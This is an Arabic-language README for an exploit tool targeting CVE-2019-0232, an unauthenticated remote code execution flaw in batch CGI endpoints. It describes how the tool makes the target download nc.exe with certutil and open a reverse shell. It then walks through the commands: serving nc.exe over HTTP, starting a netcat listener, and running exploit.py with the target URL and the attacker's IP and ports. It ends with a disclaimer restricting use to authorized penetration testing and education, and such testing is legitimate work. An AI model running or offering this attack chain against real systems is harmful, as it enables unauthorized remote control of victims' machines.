
استغلال مبني على /jaiguptanick/CVE-2019-0232
إثبات مفهوم لثغرة RCE غير مصادق عليها عبر نقاط نهاية CGI الدفعة. يقوم بتنزيل nc.exe على الهدف باستخدام certutil وتشغيل صدفة عكسية.
1. تشغيل خادم nc.exe (في نفس المجلد حيث يوجد nc.exe):
python3 -m http.server 80
2. بدء المستمع الخاص بك:
nc -lvnp 1234
3. تشغيل الأداة الاستغلالية:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
| Argument | Required | Default | Description |
|---|---|---|---|
--url | ✅ | — | عنوان URL الكامل للهدف مع نقطة نهاية CGI |
--server-ip | ✅ | — | عنوان IP الخاص بك الذي يقدم nc.exe عبر HTTP |
--server-port | ❌ | 80 | المنفذ لخادم HTTP |
--nc-ip | ✅ | — | عنوان IP لمستمع Netcat الخاص بك |
--nc-port | ✅ | — | منفذ مستمع Netcat الخاص بك |
للاستخدام في اختبارات الاختراق المصرح بها والأغراض التعليمية فقط.